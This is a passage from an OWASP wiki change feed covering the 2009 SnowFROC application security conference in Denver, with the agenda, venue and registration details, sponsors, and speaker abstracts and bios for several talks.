 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC group rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room under the discounted rate, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Cornell_Dickson_Abstract&amp;diff=54897</id>
		<title>SnowFROC Cornell Dickson Abstract</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Cornell_Dickson_Abstract&amp;diff=54897"/>
				<updated>2009-02-18T18:30:42Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Speakers: Dan Cornell &amp;amp; John Dickson */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: Vulnerability Management in an Application Security World==&lt;br /&gt;
&lt;br /&gt;
Identifying application-level vulnerabilities via penetration tests and code reviews is only the first step in actually addressing the underlying risk. Managing vulnerabilities for applications is more challenging than dealing with traditional infrastructure-level vulnerabilities because they typically require the coordination of security teams with application development teams and require security managers to secure time from developers during already-cramped development and release schedules. In addition, fixes require changes to custom application code and application-specific business logic rather than the patches and configuration changes that are often sufficient to address infrastructure-level vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
This presentation details many of the pitfalls organizations encounter while trying to manage application-level vulnerabilities as well as outlines strategies security teams can use for communicating with development teams. Similarities and differences between security teams’ practice of vulnerability management and development teams’ practice of defect management will be addressed in order to facilitate healthy communication between these groups.&lt;br /&gt;
&lt;br /&gt;
==The Speakers: Dan Cornell &amp;amp; John Dickson==&lt;br /&gt;
&lt;br /&gt;
Dan Cornell has over ten years of experience architecting and developing web-based software systems. He leads Denim Group’s security research team in investigating the application of secure coding and development techniques to improve web-based software development methodologies.&lt;br /&gt;
&lt;br /&gt;
Dan was the founding coordinator and chairman for the Java Users Group of San Antonio (JUGSA) and is currently the San Antonio chapter leader of the Open Web Application Security Project (OWASP). He is a recognized expert in the area of web application security for SearchSoftwareQuality.com and the primary author of Sprajax, OWASP’s open source tool for assessing the security of AJAX-enabled web applications. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
John Dickson is a principal at Denim Group, Ltd.and a Certified Information Systems Security Professional (CISSP) whose technical background includes hands-on experience with intrusion detection systems, telephony security and application security. He has consulted with Fortune 500 clients, Department of Defense organizations and numerous Chief Information Officers regarding their organizations’ security programs and has served as Chief Information Security Officer for a major healthcare organization. &lt;br /&gt;
&lt;br /&gt;
John regularly speaks in front of numerous security groups including the Information Systems Security Association (ISSA) and the Information Systems Audit and Control Association (ISACA). He has also presented at several conferences including CSI 2007, the annual Computer Security Institute Conference, the Texas Regional Infrastructure Security Conference (TRISC) and ConSec 2006. He is a founder and chairman of the San Antonio Technology Accelerator Initiative (SATAI), a founder of the Alamo Chapter of ISSA and the Chairman Elect of the North San Antonio Chamber of Commerce. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Bellis&amp;diff=54896</id>
		<title>SnowFROC Abstract Bellis</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Bellis&amp;diff=54896"/>
				<updated>2009-02-18T18:16:01Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Speaker: Ed Bellis VP, CISO Orbitz Worldwide */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: Doing more with less? : Automate or Die==&lt;br /&gt;
&lt;br /&gt;
The harsh economic climate has hit us all in some way. Budgets are trimmed and spending is down. We are continuously asked to do more with less, but how? Certainly the attackers aren’t spending less! Our web applications continue to grow in size and complexity. So what can an InfoSec team do to become more efficient and still effectively protect our applications?&lt;br /&gt;
&lt;br /&gt;
At Orbitz, our team took a hard look at where we were spending a lot of our time – the grunt work – and how we could spend less of it. After building out a fairly comprehensive vulnerability management program and using a lot of best in breed tools, we found ourselves with an overabundance of manual labor on our hands putting together the pieces of our vulnerability puzzle. After looking around the market space, we found nothing that could really help us with this growing problem. Low and behold, there’s a government set of standards now to put all this together. What the heck, let’s build it!&lt;br /&gt;
&lt;br /&gt;
==The Speaker: Ed Bellis VP, CISO Orbitz Worldwide==&lt;br /&gt;
&lt;br /&gt;
Ed Bellis is responsible for the protection and security of all information and electronic assets as well as compliance and ethics across the wide array of business units that make up Orbitz Worldwide on a global basis. These assets include Orbitz, CheapTickets, eBookers, Away.com, HotelClub, RatesToGo, AsiaHotels, and Orbitz for Business.&lt;br /&gt;
&lt;br /&gt;
With over 15 years of experience in information security and technology, Ed has worked with and been involved in protecting information assets at several Fortune 500 companies. Prior to joining Orbitz, Ed served as VP of Corporate Information Security for Bank of America within their Global Corporate and Investment Banking division. His credentials also include several security technology and management roles at organizations such as Ernst &amp;amp; Young, Ford Motor Company, and Young &amp;amp; Rubicam. Ed is a CISSP, CISM, a contributor to the ISM Community, and a member of ISC2, ISACA and the Chicago chapter of the ISSA.&lt;br /&gt;
&lt;br /&gt;
Ed is a frequent speaker at information security events across North America and Europe. Past talks have included venues such as The MIS Institute, The Association of Information Technology Professionals, Technology Executives Club, and the National Business Travel Association. &lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&amp;diff=54895</id>
		<title>SnowFROC Abstract Byrne</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&amp;diff=54895"/>
				<updated>2009-02-18T18:11:36Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Presentation: &amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: &amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;==&lt;br /&gt;
&lt;br /&gt;
Automated application security tools have been available for quite a while, but their manual counterparts are still doing quite well. This presentation will cover the relative strengths and weaknesses of both automated solutions, such as Web Application Firewalls (WAFs), source code review tools, and automated application scanners, and manual approaches, namely application penetration tests and manual code reviews.&lt;br /&gt;
&lt;br /&gt;
==The Speakers: David Byrne &amp;amp; Charles Henderson==&lt;br /&gt;
&lt;br /&gt;
David Byrne has almost a decade of experience in information security, specializing in web application penetration testing. Currently, he is a Senior Security Consultant in Trustwave’s SpideLabs division. Before joining Trustwave, David was the Security Architect at Dish Network. In addition to penetration testing, David has extensive experience working with developers and implementers to design security controls into applications from the ground up. He also has worked with governance and compliance groups to create security policies and standards documents.&lt;br /&gt;
&lt;br /&gt;
In 2006, David started the Denver chapter of OWASP. In 2008, he released Grendel (grendel-scan.com), an open source web application security scanner. David has spoken at many industry events, including Black Hat, DEFCON, Toorcon, and the Computer Security Institute’s annual conference. &lt;br /&gt;
&lt;br /&gt;
Charles Henderson is the Practice Manager of Trustwave’s Application Penetration Testing Group.&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&amp;diff=54894</id>
		<title>SnowFROC Abstract Byrne</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&amp;diff=54894"/>
				<updated>2009-02-18T18:08:09Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* The Speaker: David Byrne */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==The Presentation: &amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;==&lt;br /&gt;
&lt;br /&gt;
==The Speakers: David Byrne &amp;amp; Charles Henderson==&lt;br /&gt;
&lt;br /&gt;
David Byrne has almost a decade of experience in information security, specializing in web application penetration testing. Currently, he is a Senior Security Consultant in Trustwave’s SpideLabs division. Before joining Trustwave, David was the Security Architect at Dish Network. In addition to penetration testing, David has extensive experience working with developers and implementers to design security controls into applications from the ground up. He also has worked with governance and compliance groups to create security policies and standards documents.&lt;br /&gt;
&lt;br /&gt;
In 2006, David started the Denver chapter of OWASP. In 2008, he released Grendel (grendel-scan.com), an open source web application security scanner. David has spoken at many industry events, including Black Hat, DEFCON, Toorcon, and the Computer Security Institute’s annual conference. &lt;br /&gt;
&lt;br /&gt;
Charles Henderson is the Practice Manager of Trustwave’s Application Penetration Testing Group.&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54893</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54893"/>
				<updated>2009-02-18T18:04:06Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Agenda and Presentations: 5 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter the stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
